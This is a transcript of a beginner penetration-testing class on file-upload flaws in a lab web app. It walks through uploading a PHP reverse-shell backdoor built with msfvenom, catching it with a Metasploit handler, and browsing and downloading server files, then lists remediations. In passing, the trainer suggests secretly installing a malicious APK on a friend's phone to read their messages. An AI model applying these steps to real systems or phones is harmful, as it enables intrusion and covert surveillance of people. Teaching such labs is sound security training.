So the question is, I think we already have that. There are a lot of applications where there is file upload functionality, right? You can upload any kind of images, videos, documents, any other attachments to the applications. But what I see is whenever you try to upload any applications as a normal user, there will not be any problem. User one is there, user two, user three, whoever it is. Have you guys thought, okay, for example, take Facebook or Insta. Have you tried any uploading any kind of scripts instead of images? Does anyone try scripts or executables? Is there anyone who has tried uploading some scripts and executables to the Facebook instead of uploading the image? I want you to upload some exe or .js or .exe file. .exe is for installation. You can click on the exe file to install. Okay. So as a normal user, we don't try these scenarios. We just go with the functionality. But as a hacker, if you see here, user 4, this guy is a hacker. He doesn't depend only on the images or the similar extensions. Always his intention is to check for vulnerability. And if there is a vulnerability, then try to exploit. So as of now, we are discussing about file upload vulnerability. We need to know like how many scenarios we can come up so that it, you get a chance to find vulnerability. After finding vulnerability, then we have to exploit it. What is the difference between vulnerability and exploitation? Can I get the answer in the chat window? What is the difference between vulnerability? Just in 2 words. Each definition in 2 words. Vulnerability means what? Exploitation is what? Don't need the exact definition. Simple terms. These are the interview questions that are asked. Vulnerability already we discussed. Vulnerability is bad sum. Basically, it is not good for the application. It is a loophole or a weakness or a flaw or a security defect which can be used by the attacker. Okay. Then what is meant by exploitation? Exploitation is all about gaining access, taking control of the target. That's it. Very simple definitions. Remember that vulnerability assessment and penetration testing. That is our course. So we are going to learn about finding vulnerabilities and exploitation. So first step of exploitation is finding vulnerability. The next one is gaining access, that is called exploitation. But however, if you talk about real time in the sense, once you get a job, most of the companies are dependent on only the step one. Okay, left side of this. Your objective is to find vulnerability when you get into some company. Exploitation part, it is little difficult, but not all the companies expect this. Most of the companies expect, I would say like 90% of the companies do only depend on VA, vulnerability assessment. Your objective is to find vulnerabilities. 10% of the companies, they will do both. But in our course, we are going to finish or we are going to learn both the ways. So we need to learn different ways of finding vulnerabilities and then exploitation purpose. Remember, exploitation is for your knowledge purpose to know how real hacking happens. It is not for the interviews or not for the job, but we are going to learn everything. So considering that, we are discussing about file uploads. Now tell me the scenarios what you guys can try for file uploads, one after another. So some of you have mentioned file size you have to mention. You have to upload files with different sizes. For example, its maximum capacity is 5 MB. Then you try to upload files with 10 MB, 50 MB, 100 MB or 1 GB. Check if the application crashes or if it is accepting or not, like that. Second one is file extensions. You try to see whether it accepts. If it is accepting only JPEG as per the requirement, you check for .doc, .javascript, .exe, .html. These are the different files you check. The third one, can I get what is the third one? File formats. Let me read out some of the answers from you. File of large size, valid size, invalid size, format, file upload, pixels. Yes, of course, files with different pixels. Okay, password protected files, zero size file. Okay, I'll consider it like password protected file or encrypted file. Check whether it accepts or not. Encrypted, password protected, compressed files, zero size file. This is a special scenario. Anything else? What all the scenarios do you try to find vulnerabilities for file uploads? In the question, in the interview also they ask similar questions, but in few cases they ask differently. They will ask like, okay, there is a user, he's trying to browse some live streaming app, and also he has the capability of uploading some videos. He can upload the videos as a normal user, and as a subscribed user for the live streaming, he can also watch some of the videos. Now tell me like what are the different security scenarios you are going to try, or how do you perform vulnerability assessment and penetration test? So first one is uploading the files, second one is streaming the videos. So these are the scenarios you have to mention, you have to remember. Any other scenarios? Last 2 minutes to go. No, that's okay. One interesting scenario is virus files. What will happen if you're accepting virus files to the server? Definitely, your server is going to get corrupted. If server gets corrupted, the application or the website is not going to work out, or it may behave in a different way. That is one more scenario. Okay, there are few more scenarios. Actually, let me see if the setup is here. VMware setup. Oh, that's good. We have the VMware setup in the system. Let me check. If it is working out, I'll continue this, or else we'll see tomorrow. Twenty-five GB. Any other scenarios? Try to think of it. No, leave about image background. Password protected file we have already covered. I'll show you the real-time scenario of file uploads. Now you have to come up with the scenarios. Okay. Don't worry, like whatever are the systems you are seeing in the screen, there are two virtual systems. Virtual system, physical system. Physical system means laptop. So within the laptop, I am trying to put one more operating system. For a physical laptop, we have operating system called Windows 11. This one is Windows 11 system. But I have enabled virtual machines within this system, and I have configured two operating systems within the laptop. Okay, so this is the Kali Linux operating system. All of you are going to have a similar setup by the weekend. So don't worry about like how to operate this operating system, all those things. For now, just remember that I have logged into the Kali Linux operating system. Okay, and just like any other systems, here also any other operating system, here also we have the browser. Now this is the application list. Dragon icon on the left side. Click on that dragon icon. So I need a browser. Already we discussed different kinds of browsers. By default, there will be a Firefox browser. Click on that. Now we need one website for testing, right? I have one website here for testing purpose. What is this website? IPFS 128. Don't worry about how I'm trying to get it here. There is one user called Gordon B. The password is ABC123. Okay, click on login. So this is one of the website. I am trying to look for some functionality where there are file uploads functionality, and some settings I am trying to put security settings to low. So here we have the file upload functionality. Click on the upload. Whatever are the applications you have listed, some of the test applications you have listed, right? For file uploads, Facebook, Gmail, Orkut, or Google Drive, GCP applications, e-commerce applications, banking applications. Similar to that, there is one application here. For now, you can imagine this one as Facebook or Gmail or whatever it is. We have file upload functionality. As per the requirement, here try to concentrate on only this specific object. I mean to say this specific image. As per the requirement, the question is, as per the requirement, it should allow only images or any other documents. Can I get the answer by looking at the screen? It is supposed to allow only images or along with images any other files as well. Only images, right? The reason is clearly they are mentioning choose an image to upload. That's it. So we need one image to upload from here, from this website as a user. I don't have any images in this system. I'll try to download from Google. Okay. All of you know, right, how to download any kind of images from Google. Okay, there is one image of Pawan Kalyan. Let me see if I can upload this specific image. Pawan Kalyan, American Eskimo underscore dog. Okay, there is one image, no need to download from the Google. Click on browse. Okay, so many images are there under downloads. American dog. Okay, this specific image I'll try to upload. Click open. Then click on upload. No, maybe like that image quality might not be good or it is not up to the specifications. The image was not uploaded. Let me go for some other image. JPEG. Earlier I had selected JPEG. Now JPEG I'll give a try. No, this one also didn't work out. Doberman. How come? Browse. This is of 9.3 size. We'll try with this. Yes. So is the image uploaded or not successfully? Successfully uploaded. I'm trying to upload an image from client. So basically as an end user, I'm able to upload one image. This is the normal use case where any user will try. Now tell me, you have seen the functionality, right? What are the other scenarios you guys can try? Where is the file uploads? All these scenarios are done. File size, we tried, it is accepting few file sizes. File extensions also we tried. We need to upload some different file extension. We are going to do that. Virus, anyhow, for now you ignore the virus file upload. Either you can try the scenarios or tell me if you have found any defects here. One defect is, let us give a try of .txt file. I'll try to upload one text file. For that, you can make use of editor here, text editor, just like Notepad. Some message you can type, hello, this is normal content. Think like a hacker and tell me what scenarios you can do. Save as. It is getting saved under home Kali. So text file, right? txt text.txt. Txt is the extension for text files. Text.txt. So try to upload under home. Here is the text file, text.txt. Open, upload. Okay, text file also got uploaded. Is this a defect or not? First thing. It is accepting different file formats. So definitely it is a defect. How about vulnerability? Is it vulnerable or not? Is it a vulnerability? Yes or no? How do you say like it is a vulnerability? What is the problem? Text files are not so dangerous, but if it is accepting some exe files, some HTML files, then that is dangerous. Let us try to do that. I'll try to upload one HTML file. File, new, then put some content. Don't worry about this HTML. All of you are going to learn HTML in a single session. We'll plan it on the Wednesday or Thursday. Okay? Wednesday we'll plan this HTML. Right now, simple script I'm trying to put. Paragraph starting tag, ending tag. Hello. This is HTML script. And also I want to give one JavaScript alert. Alert of 1, 2, 3. Can anyone tell me what is the file extension for sample I'll put? What is the extension for HTML files? That is the question. Should I save it as .htm or .html or .css? I should save it as HTML. Remember, very simple concepts. There is no difficulty here to understand. Eventually, we'll try to learn basic scripting, all those things. Sample.html, you need to save. Save it. See here, the color coding got changed the moment we save it as HTML. So that is a advantage with any of these notepads. So just because it is HTML, it is differentiating the tags. These are called tags. The entire building HTML, we have one session. Don't worry about that. We constructed sample.html. Let us see if it is accepting sample.html. I go to the application, browse it, sample.html, open, upload. Okay, sample.html successfully uploaded. So if it is successfully uploaded, then definitely we can upload any kind of virus files. It is a vulnerability. Just .txt file, we cannot confirm the vulnerability, but if it is accepting html, .exe, .js, .css, .php, then definitely that is a vulnerability. Okay, so we have found one vulnerability, that is the application accepts files with different extensions. That is a vulnerability. Okay, any other vulnerabilities? Either you can view the scenario or view the vulnerability. I'll give you another 3 minutes now. From now, 7:57 till 8 o'clock. Think like a hacker and give me some scenarios. We have tried all these. One vulnerability we have found. Any other vulnerability we can try as part of this functionality. The functionality is click on upload, browse, select the image or text or file, open, upload. Okay, this is this is the functionality. Moses says try PDF. No, it accepts PDF because already we have tried with .html. So definitely it accepts PDF. That scenario or that vulnerability is same as multiple extensions. Any other scenarios or any other vulnerabilities? Try to concentrate on this functionality. What I'm doing, clicking on browse, selecting the image, selecting the image and clicking on the upload, and the image is successfully getting uploaded. So in this functionality, do you think any other vulnerabilities are there or scenarios? Either try with different database. Okay, that is also good, but that comes under multiple file extensions. Shahid, try class files. It accepts class files, I'm sure. Multiple files can be uploaded or not. That is a functional scenario, accepting multiple files, right? It doesn't matter for us whether it accepts now multiple files or a single file. Srikanth says browse and upload button should be checked. Already we verified it is working fine. Browse and upload. Last 2 minutes, try it out. As a hacker, you try to pay attention which can be used by the hacker. Try empty file. Empty file, I think it will accept. You can try that as well. That is a good scenario. It might be used for some other attacks. This is the file, empty file of .txt I'll create. Zip file, WAR file, it accepts. If it is accepting 2 extensions, I'm sure it accepts multiple extensions. So last 2 minutes here, empty.txt, last 2 minutes to everyone. Upload. So empty file is also accepted. Not selecting any file. Okay, click on upload. It says your image file not uploaded. Think of it, another 2 minutes, okay? We can upload XML files. We can upload okay, think of from the CIA perspective and let me know. CIA perspective. How many of you are good hackers here? Last 1 minute. Is there anyone who has not tried uh, uploading some images or documents to any of the servers? I'm sure all of you would have tried, right? Okay, I'll give you the hint. In this scenario, do you think any of the CIA got compromised? I'm trying to upload one image here. Do you think CIA got compromised? Try to upload one image or send an image to your friend from WhatsApp. Check if CIA got compromised here. Still, I didn't get the correct answer from anyone. Okay, fine. Last 30 seconds. I'll give you the answer. Don't worry about that. I know, like, still we didn't. We haven't learned the entire course. It will be little difficult to guess these kind of scenarios. However, sometimes the problems or the vulnerabilities will be there in front of our eyes, but we don't pay much attention. Okay. What is the vulnerability in this page? I think now you guys will be able to tell. Answer will be there in front of our eyes, but still we overlook it. What is the vulnerability in this page? Pay attention and then let me know. What is the image I'm trying to upload? This is the image, right? Now tell me, anyone? Available for everyone. JPEG file name. File name is okay. Whenever you upload any kind of file, image file in Facebook or Instagram, whatever it is, do they display the complete path where they are storing in the server? Okay, one of you have answered, I guess. Wali, Mufran Wali. Okay, good. Do you think they display the entire path where they are storing it in the server? In fact, no one will show from the security perspective, they are not supposed to show the entire path where it is getting stored. But here, along with the image, whatever I'm trying to upload, they are listing the path in the server where I'm trying to upload these files. Considering that, so this is one of the vulnerability. Have you guys understood? Server sensitive information is getting displayed or server paths are getting displayed. This is one of the vulnerability. Okay, fine. Now you guys tell me. I'll select browse and sample.html, open, upload. So the path is getting displayed and I'm able to upload HTML file. There is one more vulnerability. Try to guess it under 1 minute. Second chance for you guys. There is one more vulnerability. I have given you one hint. What should I do? Tell me that one more vulnerability. File extensions, it accepts files with different extension. Kokanti Aparna. In the path direction location is there to hack. Yes, of course, we have the path. I'll tell you the scenario. Assume like there is a virus file and you want to infect the system. The virus file, if you are able to upload, is that enough or is there anything else you have to do? Think like sample.html is a virus file. If I upload, that is perfect, or is there anything else I can do it from the hacker system or the client system? Your friend has a mobile and you are able to create one APK file or virus file and you have sent it to him. Will that system or the mobile gets compromised unless he clicks on that? He has to click on that, which means that he has to execute that APK file or some application. Similarly, you have to execute this file to that server or from this client. How do you execute? We know the path. We don't know which is the root path. Maybe it can be 128 or it can be DUWA, but I'm assuming like it is DUWA. Frame the complete path from the server and then click enter. Yes. Is it executing? Showing the file path is a vulnerability. That is one vulnerability. And executing your files after upload, that is one more vulnerability. I have created a script to give a pop-up or alert of 1 to 3. I'm able to execute this. Okay. So this is one of the very critical vulnerability. And one more. Just remove that file path, enter. It is listing all the files that have been uploaded to the server. This is one more vulnerability. Okay. This is how you have to find out vulnerabilities for file uploads. Repeat one more time. Very simple. As a user, you are capable of uploading any images, but my objective is to find vulnerability so that later I can try for exploitation. As part of that, click on upload, browse, upload an image file. Uploading an image file, this is okay, this is a functionality and we are able to upload it. But whenever the developers implement this functionality, they should take care of some security features so that there will not be any kind of vulnerabilities. Considering that we have tested some multiple scenarios and found out the vulnerabilities. First vulnerability is it accepts multiple extensions. That is the first vulnerability. Second vulnerability, it displays the file path where the files are getting stored in the server. That is the second vulnerability. The third vulnerability is I'm able to execute the applications which are stored in the server. For example, this is the image which I have uploaded. I'm trying to execute this file. Only on execution I'll be able to perform hacking. Enter. So am I able to get the image? Basically, the image is getting displayed here because of successful execution. Instead of uploading an image or .html, the next time I'll try to upload one image where I can take control of the system or the target. Understood? Say yes if you guys are clear. We'll move on to further concept. And if you have any questions, do let me know. I received around 10 yes. How about others? Let me know if you guys have any questions. Don't postpone it to like, okay, I can directly call to the trainer and then talk to him. Try to finish it here itself. Okay. From Monday onwards, you guys will have a revision session in the evening hours for 30 minutes. Okay. And we have a different trainer for it, not myself. Okay. Repeat one more time. Okay, let me repeat one more time, but not like this. We try that. We try in a different way. We are trying to perform vulnerability assessment and penetration testing. To do that, we have to find the vulnerability, then exploit. What did we try so far? Is it only finding vulnerability or exploitation? Some of the vulnerabilities are file path is shown, accepts multiple extensions, execute files. These are the vulnerabilities which I have found. So far, whatever we have done, is this only finding vulnerability or even exploitation? What do you think? If you are trying to perform exploitation, you should be able to read some sensitive data, or you should be able to modify some details. In fact, we checked for exploitation, it is working fine, but real exploitation, gaining access is not done yet. Access still not done. We confirm like it can be exploited. Okay, first we found the vulnerabilities. Unable to execute file means definitely like we should be able to exploit it. So the application here is a PHP application. So as part of exploitation, I'll do three scenarios here. Don't worry, I'm trying to do it by myself here, and you guys will be doing this one in this same lab in the next week first session. We need the lab setup to do that. Just for your understanding, I'm going to do it from my end now. File upload vulnerability, file upload exploitation is the one which we are trying now. To do this, first you need to find vulnerability. Find vulnerability. That has been done. After that, to perform exploitation, prepare a payload for gaining access. What do you mean by payload? Third one, run the exploitation job and wait for the access. These are the 3 steps which I have to do to gain access to the target. What do you mean by payload? Payload is a small piece of code that is used for exploitation, or the code can be within the file also. So to prepare a payload, I am going to use a tool called MSF Vina. And for running the exploitation job, I'm going to use a tool called Metasploit framework. These are two tools which I'm going to use for exploitation purpose. Remember, finding vulnerability is very important and exploitation is optional. I'm going to cover this in our course for a lot of labs, just for your knowledge purpose. Not all the companies expects the exploitation thing. Only for exploitation we are supposed to learn lot many tools. Finding vulnerability is the challenging one. Most of the companies expect that we should be good in finding vulnerabilities. This specific step 1 is done. Step 2, then I try to prepare a payload now. Okay. Go to Kali Linux. Just like command prompt in Windows operating system, we have terminal in Kali Linux. Here is the black icon is there, no? Terminal emulator. Click on that. So before that, I'll try to upload one PHP file. Okay. Because the application is PHP, I wanted to check if it accepts the PHP script or not. Save as test.php. Go to the application, file upload, browse, test.php, open, upload, uploaded. So are we able to execute this PHP file? Check one more time. Yes, we are able to execute even PHP. The reason why I uploaded PHP is the application is built with PHP technology, PHP framework. So instead of uploading normal alert script, what I'm going to do is I'm going to upload this time backdoor, which I should be able to gain access to the target. So to prepare a backdoor, I depend on a tool called MSF Vina. What is the number 123? The number 123 is normal string. You can give your name also. Hacker. Basically, this is a string. You can give anything. You just need to remember only this script for throughout the course. Remember, this is the only programming which you have to learn. Script, alert of script. Save it. You can give hacker also. You can give a pop-up call hacker. I'm trying to do the step 2 now. Preparing a backdoor. How do you prepare? There is a tool called MSF Vina. Just type that name. Then I'm trying to prepare a payload that is built with PHP / meter / reverse. This specific lab, we are going to do it in the next week, but don't worry about these tools, these commands. Very simple tools. You just need to learn 5 or 10 commands for each tool. That's it. Okay. And lhost is equal to lhost means listening host. Listening host in a sense, hacker IP address. Where should you listen for the job or exploitation job? Attacker IP address. What is the IP address of Kali Linux? This is IP address of target. Target is DVWA website. My IP address I can find out just by typing. What is the command to find IP address in Kali Linux? Can you tell me? What is the command to find IP address in Kali Linux operating system? Yes, you can use IP space A. Did you get the IP address? What is IP address? 192, 168, 150, 129. This one is 128. Okay, so attacker IP address is 129. Victim IP address is 128. I want listening host in the sense attacker IP address 192, 168, 150 dot 129 space L port. Basically, you know the ports and protocols. I have to listen through some port for gaining access. You can give any kind of port number, 5599. L port is done. And format, what is the type of format? Raw format I want to create. Okay. So I'm going to create a file. L stands for listening host. L port, listening port, L host, listening port. Okay. And try to save it. -o. I want to save it. Just mention like some name we have to give. Backdoor I'll give. Backdoor.php. That's it. Enter. So has it created the file? Type ls. Remember the command ls. Backdoor.php. It is there. Okay. And if you want to see the content, type cat space backdoor.php. It is able to list this file. Don't worry like what is there in this file. We are more concerned about the IP address and the port number. Okay, backdoor is ready. Now I want to run one job. So out of these 3 steps, finding vulnerability is done. Preparing a payload. Payload is the backdoor.php, that is also done. Now we should run for the exploitation job and wait for the access. That's it. That's the 3rd step we are supposed to do. Go to the application. Instead of uploading the normal PHP, I'm going to upload backdoor.php. But I should run one job in parallel in the terminal. So to run that job, there is a tool called MSF console, Metasploit framework. I have to work on that tool. So that tool depends on one database service called PostgreSQL. Okay. PostgreSQL. Start. So we are supposed to start this service to start Metasploit framework. Command not found. Basically, you need to provide root credentials. Sudo space you have to give and Kali. Service has been started. Remember the command MSF with MSF console. I'm going to start Metasploit framework. Remember, for entire our course, we are going to use Metasploit framework for exploitation purpose or gaining access. MSF console, enter. I'm going to hack PHP application, so I created a backdoor with .php. If I am going to hack a mobile, what is the extension I am supposed to create if it is for Android mobile? Can anyone tell me? I'm talking about this one. Backdoor.php I'm going to create if it is a PHP application. If it is Android application, what is the file extension I'm supposed to create? Android. Everyone knows, right? Android mobiles. No idea. Same thing. You are supposed to give .apk file. Harish Babu. Yes, correct answer. .apk Android package kit.apk. Remember, we'll do this practical in some of the special session. So we are going to hack a mobile. You need to create some test.apk file and give it to your friend. In case if he installs it, you take control of his mobile. We are able to see their call list, messages, images, videos, everything. But no one will install it if you give normally the, okay, please install this apk file, I want to hack your mobile. No one will install it. Either you have to take from him some or other way for a few seconds and suddenly install it. That's it. Your job is done. You can hack their mobile anytime, whenever you want it. Or store it in one common location. Prepare that apk file in such a way that, okay, this is a apk for gaming app or apk for some app, some offers in e-commerce applications. Those are social engineering attacks. Let us take this latter. For today, we'll try with backdoor.php. Where are we? We have started the Metasploit framework. It has been started and there are 2006 exploitation modules are there. One of the exploitation module is PHP. Okay. Similarly, Android exploitation modules also there. I'm going to use a exploitation module called multi-handler, multi/handler. Then type show space options. There are no specific options to set. Then we need to use the payload, set space payload space, or you can use even show payloads. It will list all the payloads. Show space payloads. If you list all the payloads, we have to select the relevant payload. Our payload is related to php/meterpreter/reverse TCP. So for Windows application, you need to select the Windows-based payload. For PHP means you have to select PHP related payload. You can see the list of payloads here. So Python is there. PHP payloads are here. Scroll up. Multi-handler. If you are trying to target, go slowly. Okay. If you are, no, this one again we are going to revise it. Don't worry about these tools. Just try to understand the concept, how the real exploitation is done. Okay. Linux, Java applications. Again, Linux related. Okay. If you are selecting or if you are going to hack Android, you need to select Android related payload, Android/meterpreter/reverse TCP. So just because I am working on PHP, I'll try to select PHP/meterpreter/reverse TCP. Copy. Okay, now we have to make use of this payload. The command is set space payload space payload name. Enter. Again type show space options. We need to give L host and L port. These are the default values. There are two things to set whenever you run this Metasploit framework. One is module options, other one is payload options. Module options, there are no parameters to set. Payload options, you need to set L host and L port. So can anyone tell me what L host I have to give? Set space L host space. Is it attacker IP address or victim IP address? L means listening. What do you think? Listen means I am listening, so that I am listening at the gate. If someone enters into the gate, I can scan them. Similarly here, this is attacker IP address is the answer. That is 192. Set L host as 192.168.150. And what is attacker IP address? Attacker IP address is 129. Okay. And the victim IP address 128. Yes. Set L host. L host has been set. Set space L port space. We need to give listening port. What is the backdoor you have created? File, open, backdoor.php, open. The same L host and L port we need to give. 5599 is a port we have configured. What in case if you give a different port number, your exploitation will not work. That's it. Very simple. So it is this 5599. Okay. Enter. Check if all the options are uploaded or not. Again, type show space options. So these two values has been updated. That's it. You can run the job. Exploit. The job is running and I'm continuously listening in the attacker IP address through this port. But still we didn't get access to the 128. How to get access? You need to upload that backdoor. Browse, backdoor file, open, upload. Okay, successfully uploaded. Let us see in case we have any activity in this terminal. I'm listening through this port, still no activity. Why? What is the problem? I have uploaded successfully. I am running the exploitation job, but still I didn't get access to the target. Target is the web server or the website. What is the problem? Can anyone guess? Shahid says self-host is the problem. No, that is not the correct answer. Okay, any more clues or answers or guesses? You have uploaded the file after exploitation. So what should we do, Anita? Let me give permissions for you guys to speak. Okay, now anyone who wants to say, we can unmute and then talk.
We did not try to exploit it till after uploading the image. I mean, all five.
So what I am supposed to do?
We can try with the L host and L port and with the path.
L host and L port with the path. So should
Yes.
Okay, tell me, like in the terminal should I work or in the website? Oh, that's good. Any more answers as well? I have uploaded the file, right? So I'm continuously listening through some port. I'm just waiting for the file to be executed, right? Yes, some of you have answered it correctly. I just uploaded it, but you need to execute that file for you to gain access to the target. Copy this. This is one of the sample demo of hacking. Don't worry if you didn't understand the exploitation part. We are going to do all these practical labs from third week. So you see the terminal, no activity yet. No activity yet. The moment you upload and then execute, enter, go back to the terminal. See here, what is the message? Meterpreter session 1 opened. So the attacker IP address is 129.55.99 is a port. It has opened some random port number in 128 to communicate to the target. Now I have gained access to the target. How do you know that? Just type sysinfo. It is showing the target details. Sysinfo, Metasploit, OS name, and its version and application. This is not the application. Any other comments also we can try. What comments should I try? If you don't know the comments, just type help. You get all the commands which you can do it. I use sysinfo to get the system details. ls you can use. Then make directory you can use. Download also you can use to get the list of files. Change mod, copy source directory. Let me try a few more commands. ls I'll try. ls. So it is listing all the server files. right? You can download these files as well in case if you can give correct source path and server path. Let me try to download source and destination. Source is this. Oops. By default, it would have downloaded to some path. My current working directory is what? Upload folder, whatever is there in the server, change directly to uploads. LS. So all the images, whatever we upload, again it got downloaded to this location. Okay, so we are able to compromise the server. We are able to take control. This is one of the exploitation practicals, just for your understanding. All of you are going to practice similar labs starting from 3rd week. Okay, does anyone has any questions? Still, if you want to gain shell session, you'll be able to get the shell session as well from the terminal. How to get that? Just type shell. Shell session got created. So if I want to find the IP address, how do I type? IP space A. So it is showing the IP address of the server, not your system. This is Kali Linux. From Kali Linux, I'm able to see server IP address, which means that the target is compromised. Okay. Come out of this shell session. Exit. Fine. Okay. So first we have found a vulnerability. Then second step, we have exploited the vulnerability. For exploitation, I have used 2 tools. One is MSF Venom, other one is Metasploit. Okay. So to do this exploitation, first thing is you should be good at finding vulnerabilities. This step is very important. Okay. Finding vulnerability is very important. Exploitation is just about making use of the tools. To be good in this finding vulnerabilities, you need to learn different ways of vulnerabilities for a website and then be thorough with the concepts. Even for the jobs and interview perspective, this is our main goal. Exploitation part, 5 to 10% will ask, but finding vulnerabilities is very important, which you should be thorough with the course. Yes, any questions now? Anyone? Once the lab setup is done, you guys can practice this practical lab. Any questions, anyone? If you put it in the chat window, or you can unmute and speak. Is it interesting? We'll try with the APK sometime after 2nd week or 3rd week. I need a mobile for that. Who wants to give the mobile? I'll give the APK. You just need to install that APK in your mobile. Let us see like what are the details I can see in your mobile. 3 people are ready. Okay. We'll try it in the next week, not today. Or else I'll arrange a special session just for mobile hacking. Not this weekend, next weekend we'll give it a try. Fine, guys. Any other questions as part of this exploitation? Now that you have learned how to hack a PHP application by using file uploads, right? Then as a security engineer, it is not just hacking. Raju, I didn't understand the question. You can unmute and then talk.
Yeah, hi Harris. Can you please once go to command prompt, which in Kali Linux? Actually,
Yes.
while we were executing, we have executed, everything was good. So when you scroll, can you please scroll up once? So there is you told one word after executing to check system. You tried some command actually. So just scroll down once.
Shell I tried.
I thought abo shell.
LS is to list the files in the server. It can be in any terminal, but as of now, the control is there in the server, not in the local system. Control is from local system. I'm able to control the remote system, that is victim server. That is the reason it is listing the server files. It is not listing the local files. If I type ls in my system, it shows the local path, right? The local path is Kali and uploads. But here it is showing the server related files. Is it clear? Yeah. Any other questions, guys? Anyone? Okay, this session is just for demo purpose. You can assume like what we are going to learn. But as an engineer, you should know how to stop hacking also. So if you want to stop hacking, can anyone tell me what are the recommendations do you provide based on this list? Give me some recommendations as a security engineer to avoid this kind of exploitations or the vulnerabilities. If I don't know the path, is it, for example, accepts multiple extensions, file path is shown, able to execute the files. Assume like I don't know the path where the server is storing these files. Is it possible for the exploitation? Yes or no? Attacker doesn't know the path where exactly the server stores these files. It is not possible. Out of these three vulnerabilities, even if you don't know one vulnerability, it is not possible for the exploitation. But as an application owner, as a security engineer, we should make sure that even though if the exploitation is not possible, we should not allow any kind of vulnerabilities. Okay. So I'll make sure that file paths are not shown for the end user. This is one recommendation I give. I'll make sure that it accepts only specific file types, only JPEG. I'll make sure that the uploaded files should not get executed from the client. These are the recommendations which I'm going to provide to the developers. Any other recommendations? Recommendations, or you can say are remediations. Tell me any other remediations for file uploads. Can we hide the path? Yes, that's what we are supposed to hide that path. We are not supposed to show to the end user. That is one of the recommendation. Set size limit. Yes, that is one more recommendation. Don't allow files after or beyond some specific size. Password should be alphanumeric letters to avoid vulnerability. Anyhow, we are not talking about password in this scenario. Think of file uploads. What are the other recommendations we can give? 3 recommendations you guys are given. So accept only images, don't show file paths, don't execute the files. Okay. Then check for virus before uploading. What I'm saying is check for upload virus file uploads. You scan the file before you store it in the server. Is this one more recommendation? Where did you see this kind of scenarios? Do you know any application where it scans for the virus before uploading to the server? Yes or no? If yes, what is the application name? Log into your Gmail. Try to send a file from your system to any of your friends, resume or some image file or video. Initially, it says scanning for viruses. Okay, just all of you check once you finish this session. Gmail is the best example. They check for virus before uploading or before viewing it. Fair enough. Any other recommendations you provide for the application owners or the developers? Thirty seconds to answer this question. Don't allow execution, that is already covered. How about there is one more recommendation which we have to provide. Definitely go to this functionality. You upload the file, any file, and then click on upload. Your file is getting uploaded and it is listing the path. Path is a different vulnerability. Along with that, based on this, do you want to give any recommendations? How about try to send one image from your WhatsApp to any of your friends. This scenario everyone tried. Any idea, anyone? Come on, I would expect at least one person. I know like it is difficult, but still maybe you guys can try. I gave you the example. WhatsApp, you are sending one image from your mobile to your friend. So based on that, are you missing any of the recommendations based on that functionality? We have to hide the path. That is already done. Srikanth. Yeah, that's good catch. File name, guys. File name is shown, but we are storing with the same name in this application. But in WhatsApp, it will not get stored with the same name. Have you observed that? How many of you have observed that? You send a file in your friend system, it will not be saved with the same name. It will be saved in a different name. How many of you have seen this? 1, 2, 3. That's it. It will be saved with a different name because the file will go to the server and it gets downloaded to your friend system, and it will be like some name underscore 0011 some number. Basically, the recommendation is don't store it same name. That is a recommendation. Same name as uploaded name. Okay. And last one is, I think it is very difficult for you guys to guess. Maintain dedicated server for storage of files. Why? What is the purpose? Can anyone tell me? Why do you want a dedicated server? Instead of storing in the web server or database server, you keep all these files and videos in a different server. What is the purpose? We are not writing any logic in the dedicated server. We are just using it for storage. The reason is, if you are storing all these files in the database server or the web server, if there is any vulnerability in the files, your database server also gets compromised, web server also gets compromised. If it is in a dedicated server, only the server gets compromised, but the application functionality will remain same. It will not be affected. Okay, that's the reason you have to maintain a dedicated server for storing the files. So this is all about file upload functionality, file upload vulnerability and exploitation, and recommendations for fixing the vulnerabilities. This is all for today. Any questions, anyone? All of you are going to practice the similar lab in the next week. Don't worry about that. This is just for your demo purpose. Getting control means not only about the downloading of images. You can do anything. You can modify the image. So downloading means confidentiality compromised. You try to modify it, you are able to compromise the integrity. Or you try to delete some services, the availability will be affected. Just because it is a web server, we did in this manner. If it is a Windows system, we try to gain remote access. RDP we can do. Sai Ishwar. Okay, guys, thank you so much. Let us talk about tomorrow. Tomorrow's session, should I give any assignment for you? Okay, no assignment for tomorrow. Let us connect tomorrow with some interesting concept. I'll tell you very interesting things. Tomorrow we are going to start computer networks basics. Thank you, guys. Have a great day.